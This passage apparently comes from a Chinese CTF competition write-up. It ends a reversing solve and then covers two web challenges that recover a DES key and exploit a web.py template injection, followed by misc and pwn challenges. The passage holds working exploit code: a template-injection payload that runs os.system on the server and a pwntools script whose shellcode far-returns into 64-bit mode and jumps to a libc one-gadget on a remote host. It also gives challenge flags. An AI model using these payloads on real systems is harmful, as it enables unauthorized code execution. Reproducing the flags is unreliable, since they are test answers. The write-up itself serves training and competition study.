    Mirrors en() step by step: the words are read back in en()'s output order
    (t3, t4, t1, t2), the output whitening is removed, the rounds run in
    reverse order (28, 24, ..., 0) with the second half of each round undone
    first, each constant is XORed off before the rotation it followed, and
    ROR/ROL are swapped.  Finally the input whitening is removed and the words
    are returned in the original order t1, t2, t3, t4.
    """
    t3 = u32(data[0:4])
    t4 = u32(data[4:8])
    t1 = u32(data[8:12])
    t2 = u32(data[12:16])

    # Undo the output whitening of en().
    t3 ^= 0x0EF75CB8F
    t4 ^= 0x0A037222A
    t1 ^= 0x0BA69619A
    t2 ^= 0x60798932
    for i in range(0,32,4)[::-1]:
        # Undo the second half of the round: t5/t6 are recomputed from the same
        # (t3, t4) values en() used there.
        tt5 = to_bytes(t3)
        t5 = index_table1[tt5[0]] ^ index_table2[tt5[1]] ^ index_table3[tt5[2]] ^ index_table4[tt5[3]]
        tt6 = to_bytes(t4)
        t6 = index_table2[tt6[0]] ^ index_table3[tt6[1]] ^ index_table4[tt6[2]] ^ index_table1[tt6[3]]
        # Round trace left in by the author (prints on every iteration).
        print(hex(t1),hex(t2),hex(t3),hex(t4),hex(t5),hex(t6))
        t2 ^= (xor_table[i+3] + t5 + t6 * 2)%0x100000000
        t2 = ROR(t2,1)
        t1 = ROL(t1,1)
        t1 ^= (xor_table[i+2] + t5 + t6)%0x100000000

        # Undo the first half using the now-restored (t1, t2).
        tt5 = to_bytes(t1)
        t5 = index_table1[tt5[0]] ^ index_table2[tt5[1]] ^ index_table3[tt5[2]] ^ index_table4[tt5[3]]
        tt6 = to_bytes(t2)
        t6 = index_table2[tt6[0]] ^ index_table3[tt6[1]] ^ index_table4[tt6[2]] ^ index_table1[tt6[3]]
        t4 ^= (xor_table[i+1] + t5 + t6 * 2)%0x100000000
        t3 = ROL(t3,1)
        t4 = ROR(t4,1)
        t3 ^=(xor_table[i] + t5 + t6)%0x100000000

        #print(hex(t1),hex(t2),hex(t3),hex(t4),hex(t5),hex(t6))
    # Undo the input whitening; output order is t1, t2, t3, t4.
    t1 ^= 0x0C01A4D6E
    t2 ^= 0x0A4CB6636
    t3 ^= 0x5B0F5BA1
    t4 ^= 0x2B266926
    return p32(t1) + p32(t2) + p32(t3) + p32(t4)

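def xor_str(a, b):
    """XOR the first 16 characters of *a* and *b* byte-wise and return the result as a str.

    Exactly 16 characters are consumed; shorter inputs raise IndexError.  Built
    with ``str.join`` instead of repeated concatenation, and with ``range`` so
    the helper also runs on Python 3.
    """
    return ''.join(chr(ord(a[i]) ^ ord(b[i])) for i in range(16))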

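# Ciphertext extracted from the binary: three 16-byte blocks.
de_flag = [0x4F, 0x6F, 0xA7, 0x87, 0xE9, 0x51, 0x87, 0x64, 0x38, 0x2A, 0x46, 0xE5, 0x4F, 0x21, 0x9E, 0x1C, 0xCD, 0x65, 0xE1, 0x9A, 0x4F, 0xCF, 0xDE, 0x52, 0x09, 0xBF, 0x53, 0xC4, 0xB0, 0x95, 0x75, 0x31, 0xAC, 0x2F, 0xF4, 0x97, 0x1D, 0xA5, 0x9A, 0x02, 0xA8, 0xFF, 0xAE, 0x2E, 0xB9, 0x70, 0xCC, 0x02]

# The same bytes as a str, which is what de()/xor_str() operate on.
de_c = ''.join(chr(b) for b in de_flag)
# a = en('a'*16)
# print('---')
# print(de(a))

# Decrypt the third block and XOR it with the second, i.e. a CBC-style
# decryption of the last block with the previous block as chaining value.
print(xor_str(de_c[16:32], de(de_c[32:48])))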

# ~Exc3p7i0n-Ori3n7ed-Pr0grammin9~RoO0cks!!\o^_^o/

Web

On my raddit

8个字节分组加密,动一动LSB仍然可以解密,DES?

2e7e305f2da018a2cf8208fa1fefc238 + 加密的文件名 + 3ca92540eb2d0a42 下载文件

3ca92540eb2d0a42应该是padding,8个字节拿hashcat爆破了下

3ca92540eb2d0a42:0808080808080808:ldgonaro

Session..........: hashcat
Status...........: Cracked
Hash.Type........: DES (PT = $salt, key = $pass)
Hash.Target......: 3ca92540eb2d0a42:0808080808080808

爆破出来一个 ldgonaro,但用它解出的 FLAG 不对,应该是个等效密钥(DES 忽略每个密钥字节的最低位,只在这些位上不同的密钥是等价的)。
首页有下载链接,发现能下载文件,于是解密:

from Crypto.Cipher import DES
key = 'ldgonaro'  # cracked with hashcat above; differs from the real key 'megnnaro' only in the low bit of each byte, which DES ignores
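def decrypt(decryptText):
    """Decrypt the hex string *decryptText* with DES-ECB under ``key`` and strip the padding.

    The last byte is read as the pad length (PKCS#7 style) and that many bytes
    are dropped from the end.  Returns '' when the input is not valid hex or
    decryption fails.  Only ``Exception`` subclasses are caught, so Ctrl-C and
    SystemExit are not swallowed, and the local no longer shadows ``str``.
    """
    try:
        cipher = DES.new(key, DES.MODE_ECB)
        raw = decryptText.decode('hex')
        plain = cipher.decrypt(raw)
        return plain[:-ord(plain[-1])]
    except Exception:
        return ""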
# Token from the download link quoted above: the 2e7e305f... prefix, the
# encrypted file name, and the 3ca92540eb2d0a42 padding block.
print decrypt('2e7e305f2da018a2cf8208fa1fefc238522c932a276554e5f8085ba33f9600b301c3c95652a912b0342653ddcdc4703e5975bd2ff6cc8a133ca92540eb2d0a42')

=>m=d&f=uploads%2F70c97cc1-079f-4d01-8798-f36925ec1fd7.pdf

将f参数换成app.py加密得到E2272B36277C708BC21066647BC214B8,然后得到密钥megnnaro

On my raddit2

https://securityetalii.es/2014/11/08/remote-code-execution-in-web-py-framework/
web.py的db写的有问题:

# coding: UTF-8
import os
import urllib
import urlparse
from Crypto.Cipher import DES
ENCRPYTION_KEY = 'megnnaro'  # DES key recovered from the downloaded app.py (see above); the misspelt name is kept because encrypt()/decrypt() use it
def encrypt(s):
    """PKCS#7-pad *s* to a multiple of the DES block size, encrypt it in ECB mode and return hex.

    A full block of padding is added when *s* is already aligned.
    """
    pad_len = DES.block_size - len(s) % DES.block_size
    padded = s + chr(pad_len) * pad_len
    cipher = DES.new(ENCRPYTION_KEY, DES.MODE_ECB)
    return cipher.encrypt(padded).encode('hex')

def decrypt(s):
    """Inverse of encrypt(): hex-decode, DES-ECB decrypt, strip the padding, parse as a query string.

    Returns the key/value pairs as a dict, or {} (after printing the error
    message) when any step fails.
    """
    try:
        raw = s.decode('hex')
        cipher = DES.new(ENCRPYTION_KEY, DES.MODE_ECB)
        plain = cipher.decrypt(raw)
        unpadded = plain[:-ord(plain[-1])]
        return dict(urlparse.parse_qsl(unpadded))
    except Exception as e:
        print e.message
        return {}


# Request 1: the decrypted query string is presumably rendered by a web.py
# template, so the ${...} expression in 'l' runs server-side (the advisory
# linked above); this is why user-controlled text must never be spliced into
# template source.
print encrypt(urllib.urlencode({'m':'p','l':"${[].__class__.__base__.__subclasses__()[59]()._module.linecache.os.system('/read_flag > /tmp/fffza')}"}))

# Request 2: fetch the written file through the 'd' (download) action, the same
# m=d&f=<path> form as the decrypted download token above.
print encrypt(urllib.urlencode({'m':'d','f':'/tmp/fffza'}))

然后依次访问即可。

MISC

Lumosity

签到题

EV3 Basic

LEGO EV3机器人的数据包

81 xx 81 xx 84 xx 应该表示列,行,字符

0a 14 1e 28 32 3c 46 50 5a 64 6e 78 82 8c 96 a0
28   h  i  t  c  o  n  {  m  1  n  d  5  t  0  r  m
36   _  c  o  m  m  u  n  i  c  a  t  i  o  n  _  a
44   n  d  _  f  i  r  m  w  a  r  e  _  d  e  v  e
52   l  o  p  e  r  _  k  i  t  }

32world

64bit ELF,retf切到32位代码,执行shellcode,24字节,syscall的时候IP需要大于FFFFFFFF

line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x0000000c  A = instruction_pointer >> 32
 0001: 0x15 0x00 0x01 0x00000000  if (A != 0x0) goto 0003
 0002: 0x06 0x00 0x00 0x00000000  return KILL
 0003: 0x06 0x00 0x00 0x7fff0000  return ALLOW

切回64bit,跳一个one gadget,读一下fs拿地址

from pwn import *

#p = process('./32world')
p = remote('54.65.133.244', 8361)  # swap for process('./32world') to run locally

# Part A: the two 32-bit instructions, assembled while the context is i386.
context(bits=32, arch='i386')
sc_retf = asm('retf')        # far return: pops EIP and a new CS
sc_push = asm('push 0x33')   # 0x33 is the 64-bit user code selector on Linux
print sc_retf, len(sc_retf)

# Part B: the 64-bit body, assembled after switching the context to amd64.
context(bits=64, arch='amd64')
sc_body = asm('mov rax, fs:[rdx+0x900]; add rax, 0xf1147; call rax')

# Layout: push 0x33 | call +0x10 (pushes the body's address and skips its 16
# bytes) | body | retf.  retf therefore resumes in sc_body with CS=0x33.  The
# constants 0x900 and 0xf1147 are specific to the target's libc build.
sc1 = sc_push + '\xe8\x10\x00\x00\x00' + sc_body + sc_retf
print sc1, len(sc1)

p.sendline(sc1)
p.interactive()